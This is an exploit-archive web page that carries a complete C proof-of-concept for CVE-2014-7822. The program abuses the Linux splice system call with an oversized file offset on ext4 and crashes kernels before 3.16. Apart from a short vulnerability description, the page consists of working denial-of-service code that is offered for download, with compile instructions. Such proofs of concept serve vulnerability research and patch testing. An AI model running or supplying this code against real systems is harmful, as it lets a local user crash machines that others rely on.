what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Linux splice_write Kernel Panic

Linux splice_write Kernel Panic
Posted Apr 11, 2015
Authored by Emeric Nasi

The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call, as demonstrated by use of a file descriptor associated with an ext4 filesystem. This is proof of concept code that triggers the kernel panic.

tags | exploit, denial of service, kernel, local, proof of concept
systems | linux
advisories | CVE-2014-7822
SHA-256 | 7020e5cb8eb79147f24ae47ba61603cfdfc59462bdfbc98295dfc6b21c5a9a40

Linux splice_write Kernel Panic

Change Mirror Download

/* ----------------------------------------------------------------------------------------------------
* cve-2014-7822_poc.c
*
* The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file
* which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call,
* as demonstrated by use of a file descriptor associated with an ext4 filesystem.
*
*
* This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
* Works on ext4 filesystem
* Tested on Ubuntu with 3.13 and 3.14 kernels
*
* Compile with gcc -fno-stack-protector -Wall -o cve-2014-7822_poc cve-2014-7822_poc.c
*
*
* Emeric Nasi - www.sevagas.com
*-----------------------------------------------------------------------------------------------------*/


/* ----------------------- Includes ----------------------------*/

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <limits.h>

#define EXPLOIT_NAME "cve-2014-7822"
#define EXPLOIT_TYPE DOS

#define JUNK_SIZE 30000

/* ----------------------- functions ----------------------------*/


/* Useful:
*
+============+===============================+===============================+
| \ File flag| | |
| \ | !EXT4_EXTENTS_FL | EXT4_EXTETNS_FL |
|Fs Features\| | |
+------------+-------------------------------+-------------------------------+
| !extent | write: 2194719883264 | write: -------------- |
| | seek: 2199023251456 | seek: -------------- |
+------------+-------------------------------+-------------------------------+
| extent | write: 4402345721856 | write: 17592186044415 |
| | seek: 17592186044415 | seek: 17592186044415 |
+------------+-------------------------------+-------------------------------+
*/


/**
* Poc for cve_2014_7822 vulnerability
*/
int main()
{
int pipefd[2];
int result;
int in_file;
int out_file;
int zulHandler;
loff_t viciousOffset = 0;

char junk[JUNK_SIZE] ={0};

result = pipe(pipefd);

// Create and clear zug.txt and zul.txt files
system("cat /dev/null > zul.txt");
system("cat /dev/null > zug.txt");

// Fill zul.txt with A
zulHandler = open("zul.txt", O_RDWR);
memset(junk,'A',JUNK_SIZE);
write(zulHandler, junk, JUNK_SIZE);
close(zulHandler);

//put content of zul.txt in pipe
viciousOffset = 0;
in_file = open("zul.txt", O_RDONLY);
result = splice(in_file, 0, pipefd[1], NULL, JUNK_SIZE, SPLICE_F_MORE | SPLICE_F_MOVE);
close(in_file);


// Put content of pipe in zug.txt
out_file = open("zug.txt", O_RDWR);
viciousOffset = 118402345721856; // Create 108 tera byte file... can go up as much as false 250 peta byte ext4 file size!!
printf("[cve_2014_7822]: ViciousOffset = %lu\n", (unsigned long)viciousOffset);

result = splice(pipefd[0], NULL, out_file, &viciousOffset, JUNK_SIZE , SPLICE_F_MORE | SPLICE_F_MOVE); //8446744073709551615
if (result == -1)
{
printf("[cve_2014_7822 error]: %d - %s\n", errno, strerror(errno));
exit(1);
}
close(out_file);

close(pipefd[0]);
close(pipefd[1]);


//Open zug.txt
in_file = open("zug.txt", O_RDONLY);
close(in_file);

printf("[cve_2014_7822]: POC triggered, ... system will panic after some time\n");

return 0;
}



Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close